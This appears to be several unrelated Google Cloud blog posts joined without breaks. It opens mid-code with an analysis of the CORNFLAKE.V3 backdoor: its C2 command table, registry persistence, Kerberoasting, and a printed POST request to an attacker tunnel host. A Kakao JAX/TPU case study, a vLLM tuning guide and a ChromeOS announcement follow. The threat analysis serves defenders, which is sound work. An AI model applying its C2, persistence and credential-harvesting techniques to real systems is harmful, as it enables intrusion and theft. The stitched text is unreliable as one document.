delay = 1000 * 60 * 5;
}
}
C2 Communication
This function, named main, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path /init1234, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.
This request is answered by the C2 with 2 possible responses:
ooff – the process exits
atst – the atst function is called, which establishes persistence on the host
If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it. The following values are accepted by the program:
Command
Type
Description
0
EXE
The received payload is written to %APPDATA%<random_8_chars><random_8_chars>.exe and launched using the Node.js child_process.spawn()function.
1
DLL
The received payload is written to %APPDATA%<random_8_chars><random_8_chars>.dll and launched using the Node.js child_process.spawn()function as an argument to rundll32.exe.
2
JS
The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn()function.
3
CMD
The received payload is launched from memory as an argument to cmd.exeusing the Node.js child_process.spawn()function. Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.
4
Other
The payload is written to %APPDATA%<random_8_chars><random_8_chars>.log.
Table 2: CORNFLAKE.V3 supported payloads
Persistence
The atst function, called by main, attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdaterunder HKCUSoftwareMicrosoftWindowsCurrentVersionRun.
The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process. If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e, which contains the full malicious script. This script is written to the <random_8_chars>.log file in the Node.js installation directory and its path is saved to the path2file variable.
If node.exe was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.
The path2file variable is then set as an argument tonode.exe in the newly created ChromeUpdater registry key. This ensures that the malware executes upon user logon.
Executed Payloads
As observed in the main function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.
Active Directory Reconnaissance
The first payload observed on the host was a batch script containing reconnaissance commands. The script initially determines if the host is domain-joined, this condition determines which specific reconnaissance type is executed.
Domain Joined
Query Active Directory Computer Count: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.
Display Detailed User Context: Executeswhoami /all to reveal the current user’s Security Identifier (SID), domain and local group memberships, and assigned security privileges.
Enumerate Domain Trusts: Executes nltest /domain_trusts to list all domains that the current computer’s domain has trust relationships with (both incoming and outgoing).
List Domain Controllers: Executes nltest /dclist : to find and list the available Domain Controllers (DCs) for the computer’s current domain.
Query Service Principal Names (SPNs): Executes setspn -T <UserDomain> -Q */*to query for all SPNs registered in the user’s logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=…Users).
Not Domain Joined
Enumerate Local Groups: Uses Get-LocalGroup to list all security groups defined locally on the machine.
Enumerate Local Group Members: For each local group found, uses Get-LocalGroupMember to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).
Kerberoasting
The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.
Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.
This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.
The script downloads the PHP package from windows.php[.]net,writes it to disk as php.zipand extracts its contents to the C:Users<User>AppDataRoamingphpdirectory. The CORNFLAKE.V3 PHP sample is contained in theconfig.cfg file that was also dropped in the same directory and executed with the following command line arguments:
To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA% instead of the fixed ChromeUpdater string used in the Node.js version. To communicate with its C2 a unique path is generated for each request, unlike the static/init1234 path:
POST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1
Host: varying-rentals-calgary-predict.trycloudflare[.]com
Connection: close
Content-Length: 39185
Content-type: application/octet-stream
Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:
Command
Type
Notes
0
EXE
This decrypted content is saved to a temporary executable file (<rand_8_char>.exe) created in a random directory within the user’s %APPDATA% folder, and executed through PowerShell as a hidden process.
1
DLL
The decrypted content is saved as a <rand_8_char>.png file in a temporary directory within the user’s %APPDATA% folder. Subsequently, rundll32.exe is invoked to execute the downloaded file.
2
JS
This decrypted content is saved as a <rand_8_char>.jpg file in a temporary directory within the user’s %APPDATA% folder. The script attempts to check if Node.js is installed. If Node.js is not found or fails to install from a hardcoded URL (http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip), an error message is printed. If Node.js is available, the downloaded JavaScript (.jpg) file is executed using node.exe.
3
CMD
This decrypted data is executed as a provided command string via cmd.exe or powershell.exe.
4
ACTIVE
This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant.
5
AUTORUN
The malware attempts to establish persistence by adding a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points to the script’s PHP binary and its own path.
6
OFF
This command directly calls exit(0), which terminates the PHP script’s execution.
OTHER
If none of the specific commands match, the received data is saved as a .txt file in a temporary directory within the user’s %APPDATA% folder.
The Javascript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command. Other notable changes include the change of the DLL and JS payload file extensions into .png and .jpg to evade detection and the addition of the ACTIVE and AUTORUN commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.
These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.
Executed Payloads
Active Directory Reconnaissance
A cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed. The script checks if the machine is part of an Active Directory domain and collects the following information using powershell:
Domain Joined
Total count of computer accounts in AD.
Domain trust relationships.
List of all Domain Controllers.
Members of the “Domain Admins” group.
User accounts configured with a Service Principal Name (SPN).
All local groups and their members
Current User name, SID, local group memberships and security privileges
Not Domain Joined
All local groups and their members
Current User name, SID, local group memberships and security privileges
WINDYTWIST.SEA Backdoor
Following the interaction with its C2 server, a DLL payload (corresponding to command 1) was received, written to disk as C:Users<User>AppDataRoamingShift19434078G0ZrQi.pngand executed using rundll32. This file was a WINDYTWIST.SEA backdoor implant configured with the following C2 servers:
This implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.
The following process tree was observed during the infection:
This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.
To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.
Acknowledgements
Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.
Detection Through Google Security Operations
For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on theGoogle Cloud Community blog.
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Powershell Executing NodeJS
Powershell Writing To Appdata
Suspicious Clipboard Interaction
NodeJS Reverse Shell Execution
Download to the Windows Public User Directory via PowerShell
Run Utility Spawning Suspicious Process
WSH Startup Folder LNK Creation
Trycloudflare Tunnel Network Connections
SecOps Hunting Queries
The following UDM queries can be used to identify potential compromises within your environment.
Execution of CORNFLAKE.V3 — Node.js
Search for potential compromise activity where PowerShell is used to launch node.exe from %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.
Search for compromise activity where PowerShell is executing php.exe from %AppData% path. This variant is characterized by the use of the -d argument, executing a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.
Search suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.
Search unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.
When your messaging platform serves 49 million people – 93% of South Korea’s population – every technical decision carries enormous weight. The engineering team at Kakao faced exactly this challenge when their existing infrastructure hit critical limitations. Their solution? A strategic shift to Google Cloud TPUs using the JAX framework that not only solved their immediate scalability needs but opened new possibilities for advanced AI model development.
Kakao’s approach provides a compelling example of leveraging the high-performance array computing framework JAX for AI model development at scale. While their primary training environment was GPU-based, the team made a strategic decision to adopt the JAX stack on Google Cloud TPUs to optimize for cost and efficiency.
This work laid the groundwork for the development of their proprietary Kanana model family, and several Kanana models — including Kanana-MoE — have recently been released as open source on Hugging Face Hub.
In this post, Minho Ryu and Nayeon Kim detail Kakao’s technical journey. They cover their specific implementation details, from adapting the JAX large language model framework and MaxText for custom data pipelines to their work on mixture-of-experts (MoE) model training.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e613cbe05b0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Kakao’s journey by Minho and Nayeon:
As engineers at Kakao, we develop models that serve KakaoTalk, a platform supporting services that extend far beyond text. Our rich ecosystem includes chat with over 700,000 images and stickers (emojis), voice and video calls, finance, and navigation.
KakaoTalk’s massive scale and complexity demand that our language models are not only highly efficient but also excel at understanding the Korean language and are flexible enough for diverse applications. These real-world product requirements directly influenced our technical decisions and our need for a customizable training framework.
Our journey with JAX began at an important inflection point. Our existing GPU-based infrastructure was reaching power and budget capacity constraints. We had two options: expand our GPU infrastructure and maintain our existing codebase, or adopt Cloud TPUs, which offered cost-performance advantages while requiring adoption of a new toolchain. We chose Cloud TPUs, viewing the short-term investment as worthwhile for long-term cost-performance benefits, and built our stack on JAX.
We use XPK for Kubernetes cluster management, which simplifies job creation and management on GKE without requiring Kubernetes expertise. For the data pipeline, we adopted Grain due to its deterministic behavior, which is essential for the stability of long-running AI model training jobs.
We focused on adapting the MaxText framework to fit our specific research and compatibility needs. We made two key customizations to the pipeline:
1. Multi-source data blending: When we began exploring training with MaxText, it assumed a single, pre-mixed corpus. Our research requires blending different data sources — such as web text, code, and math — with specific, dynamically-adjusted weights during different training phases. To achieve this flexibility without reprocessing terabytes of data for each experiment, we implemented a solution using Grain’s mix function. This approach allows us to define blending ratios in our configuration, providing the adaptability essential for our iterative research process. We filed a PR for this feature to be supported in MaxText natively, and it has been incorporated here since.
2. Token Processing for Efficiency and Compatibility: To maintain compatibility with our existing Megatron-LM pipeline and improve efficiency, we modified MaxText’s token processing logic. Our data preparation method constructs each training sequence by appending the first token of the subsequent sequence. This creates overlapping, continuous sequences, ensuring that no information is lost at the boundaries and maximizing data utilization.
To validate our new TPU-based workflow, we trained two models. First, we trained the Kanana 2.1 billion parameter model from scratch, and the results demonstrated that our MaxText implementation achieved performance comparable to our existing GPU-based Megatron-LM pipeline at each stage. Second, we performed depth upscaling with continued pre-training from our existing 8B model to a 9.8B architecture. Both approaches succeeded and showed consistent improvements across various benchmarks, confirming that the results on GPU were effectively reproduced on TPU.
Advancing our approach: Training Mixture-of-Experts (MoE) models with MaxText
With the core pipeline validated, we began experimenting with more advanced architectures, specifically MoE models, to build inference-efficient models that maintain strong performance. Our objectives were to explore upcycling an existing dense model into an MoE structure and to evaluate the suitability of the TPU and MaxText stack for this task.
For the experiment, we upcycled our 2.1B dense model into a 13.4B parameter (2.3B active) MoE architecture with 64 experts and 8 active experts per token. We trained this model on the exact same dataset as the original dense model to isolate the impact of the architectural change. The training was performed on v5e TPUs using MaxText with Fully Sharded Data Parallelism (FSDP).
The implementation process was straightforward. We found that MaxText’s flexible design, built on Flax, Optax, and Orbax, was well-suited for the wide range of ablations required for MoE research. Specifically:
Integrated Kernels:Megablocks MoE kernels which support optimized MoE features like Group GEMM were already integrated into JAX.
Combining Schedules: We used the optax.join_schedules function to combine multiple learning rate schedules (e.g. warmup, constant, and annealing) into a single, custom schedule for our training run. This ability to combine different schedules is very useful to experiment with different training strategies.
Code Customization: We needed to enable the load balancing loss for our sparse matmul implementation. This required inserting a single line of code in the permute function within the MoE block of MaxText to calculate the loss directly from the router logits.
The results showed performance improvements, particularly in code and math benchmarks, suggesting domain specialization among the experts.
Performance Evaluation
This met our objectives and further demonstrated the JAX stack’s utility for advanced model development. We are now extending this work by experimenting with shared experts and replacing initial MoE layers with dense layers, modifications which are simple to implement within the MaxText framework.
Performance improvements and key takeaways
During our work, we gained early access to Trillium TPUs. We managed the transition from v5e by changing a few parameters in our XPK cluster and workload configurations. We observed an immediate and substantial throughput increase of 2.7x across our models, along with improved cost-performance efficiency.
Based on our experience, the JAX stack on TPUs provides a comprehensive and efficient environment for AI model development. The key advantages for our team include:
Performance and scalability: The JAX and XLA combination provides just-in-time compilation, and MaxText is optimized for large-scale parallel computing with support for paradigms like SPMD and FSDP.
Customizability and control: The codebase, being pure Python and built on libraries like Flax, Optax, and Orbax is intuitive and easy to modify. This allows us to implement custom data pipelines, training strategies, and novel architectures with minimal overhead.
Rapid feature adoption: The MaxText framework is updated quickly with features from new state-of-the-art models, allowing us to stay current with our research.
These strengths have made the JAX stack a powerful and flexible foundation for our work in training large language models at Kakao.
Build your Language Models with the JAX Ecosystem:
Kakao’s journey demonstrates how the JAX ecosystem’s modular design — including MaxText, Flax, Optax, and Orbax — enables the customization required for both production pipelines and advanced research, from tailored data blending to rapid experimentation with MoE architectures.
Our sincere thanks to Minho, Nayeon and their team for sharing their insightful engineering work. We look forward to seeing how they and other leading enterprises worldwide continue to use the JAX ecosystem to build the next generation of powerful and efficient language models.
Additional contributors include Hossein Sarshar and Ashish Narasimham.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottoms-up approach to determining the best accelerator for your use case and optimizing your vLLM’s configuration to achieve the best and most cost effective results possible.
Note: This guide assumes that you are familiar with GPUs, TPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal set up from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the GPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
Selecting Accelerators (GPU/TPU)
We live in a world of resource scarcity! What does this mean for your use case? It means that of course you could probably get the best possible latency and throughput by using the most up to date hardware – but as an engineer it makes no sense to do this when you can achieve your requirements at a better price/performance point.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the following Calculate Memory Requirements section.
The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.
GPU Options
L4 GPUs
g2-standard-48 instance provides 4xL4 GPUs with 96 GB of GDDR6
TP = 4
A100 GPUs
a2-ultragpu-1g instance provides 1xA100 80GB GPU of HBM
TP = 1
H100 GPUs
a3-highgpu-1g instances provides 1xH100 80GB GPU of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory from our model weights, activations, and overhead & the KV Cache memory.
model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking apart a large model across multiple accelerators (GPU/TPU) so that the model can actually fit on the hardware we need. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPU’s because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM respectively and mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while our 1xH100 instance will not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates (4xL4, 1xA100-80GB, 1xH100-80GB, TPU v5e-8, TPU v6e-4), it is time to see the best level of performance we can across each potential setup. We will only overview the H100 and Trillium (v6e) benchmarking & tuning in this section – but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
H100 80GB
In your project, open the Cloud Shell and enter the following command to launch an a3-highgpu-1g instance. Be sure to update your project ID accordingly and select a zone that supports the a3-highgpu-1g machine type for which you have quota.
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail – if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh which we will need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
code_block
<ListValue: [StructValue([(‘code’, ‘# navigate to correct directoryrncd benchmarks/auto_tunernrn# update the auto_tune.sh script – user your preferred script editorrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af46bebe0>)])]>
In the auto_tune.sh script, you will need to make the following updates:
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow up server resulting in what appears to be a hang. If either happens, edit the auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than beginning at 0.98.
Troubleshooting Note: By default, profiling is currently being passed to the benchmarking_server.py script. In some cases this may cause the process to hang if the GPU profiler is not capable of handling the large number of requests for that specific model. You can confirm this by reviewing the logs for the current run; if the logs include the following line with an indefinite hang afterwards, you’ve run into this problem:
code_block
<ListValue: [StructValue([(‘code’, ‘INFO 08-13 09:15:58 [api_server.py:1170] Stopping profiler…rn# Extensive wait time with only a couple additional logs’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af02fc8e0>)])]>
If that is the case, simply remove the –profile flag from the benchmarking_server.py calls in the auto_tune.sh script under the run_benchmark() function:
code_block
<ListValue: [StructValue([(‘code’, ‘# REMOVE PROFILE FLAG IF HANG OCCURSrnpython3 benchmarks/benchmark_serving.py \rn –backend vllm \rn –model $MODEL \rn –dataset-name random \rn –random-input-len $adjusted_input_len \rn –random-output-len $OUTPUT_LEN \rn –ignore-eos \rn –disable-tqdm \rn –request-rate inf \rn –percentile-metrics ttft,tpot,itl,e2el \rn –goodput e2el:$MAX_LATENCY_ALLOWED_MS \rn –num-prompts 1000 \rn –random-prefix-len $prefix_len \rn –port 8004 \rn –profile &> “$bm_log” # Remove this flag, making sure to keep the &> “$bm_log” # on the argument above’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af02fc400>)])]>
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In our results.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute our benchmarking script for GPU and TPU.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
<ListValue: [StructValue([(‘code’, ‘# Monitor creationrngcloud compute tpus queued-resources list –zone $ZONE –project $PROJECT’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af02fcb50>)])]>
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with the H100.
code_block
<ListValue: [StructValue([(‘code’, ‘# Head to main working directoryrncd benchmarks/auto_tune/rnrn# install required libraryrnapt-get install bcrnrn# Provide HF_TOKENrnexport HF_TOKEN=XXXXXXXXXXXXXXXXXXXXXrnrn# update auto_tune.sh with your preferred script editor and launch auto_tunerrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af592f1c0>)])]>
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU compared to GPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:
code_block
<ListValue: [StructValue([(‘code’, ‘start_server() {rnrn…rnrn for i in {1..60}; do rn RESPONSE=$(curl -s -X GET “http://0.0.0.0:8004/health” -w “%{http_code}” -o /dev/stdout)rn STATUS_CODE=$(echo “$RESPONSE” | tail -n 1) rn if [[ “$STATUS_CODE” -eq 200 ]]; thenrn server_started=1rn breakrn elsern sleep 10 # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONGrn firn donern if (( ! server_started )); thenrn echo “server did not start within 10 minutes. Please check server log at $vllm_log”.rn return 1rn elsern return 0rn firn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af7d14940>)])]>
The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the H100 GPU and the TPU v6e.
NVIDIA H100 x 80GB (a3-highgpu-1g)
Measured Throughput: The benchmark showed a single H100 vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is:
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for an a3-highgpu-1g machine type in us-central1 is approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing for the simple cost figures, this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster:
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
Metric
H100 (a3-highgpu-1g)
TPU (v6e-4)
Throughput per Instance
4.17 req/s
5.63 req/s
Instances Needed (100 req/s)
24
18
Spot Instance Cost Per Hour
$2.25 / hour
$0.56 x 4 chips = $2.24 / hour
Spot Cost Total
$54.00 / hour
$40.32 / hour
Total Monthly Cost (730h)
~ $39,400
~ $29,400
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than the a3-highgpu-1g instance, but it does so at a significantly reduced cost. This translates to massive savings at higher scales.
Looking at the performance-per-dollar, the advantage is clear:
H100: 4.17 req/s ÷ $54.00/hr ≈ 0.08 req/s per dollar-hour
The v6e-4 configuration delivers almost twice the performance for every dollar spent, making it the superior, efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep in mind the following sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – H100 could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example – perhaps if we searched a larger space we may have found a configuration with even greater cost savings potential .
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
For many workers, the frequent need to switch between devices can become cumbersome and disruptive. Otherwise simple tasks like logging in, reopening applications, and re-establishing your workspace end up consuming valuable time when done many times throughout the day. To address this challenge, we’re happy to introduce ChromeOS desk sync. This feature allows users to pick up right where they left off, moving from one ChromeOS device to another and seamlessly resuming their work. All open windows, tabs, applications, and user profile settings, along with authentication into different web services, are automatically transferred across devices.
Supporting frontline workers across industries
Across any industry, but especially frontline use cases like retail, hospitality, healthcare, and manufacturing, desk sync is a practical addition to support worker productivity.
In retail and hospitality, desk sync helps streamline operations during shift changes and improve customer interactions. Associates can pick up a new device at the start of their shift and immediately access their work, whether for inventory management, team communication, sales, and more, to better facilitate shift changes. Front desk staff can immediately access guest reservations, check-in systems, and service requests through any available device at the reception desk and continue right where they left off, making guest experiences smoother as well. This instant access allows employees to focus on providing a more consistent service, reducing wait times and improving customer experiences in the process. Even more, new employees may find it easier to adapt to shared device environments, as their familiar workspace can follow them and reduce setup times across devices.
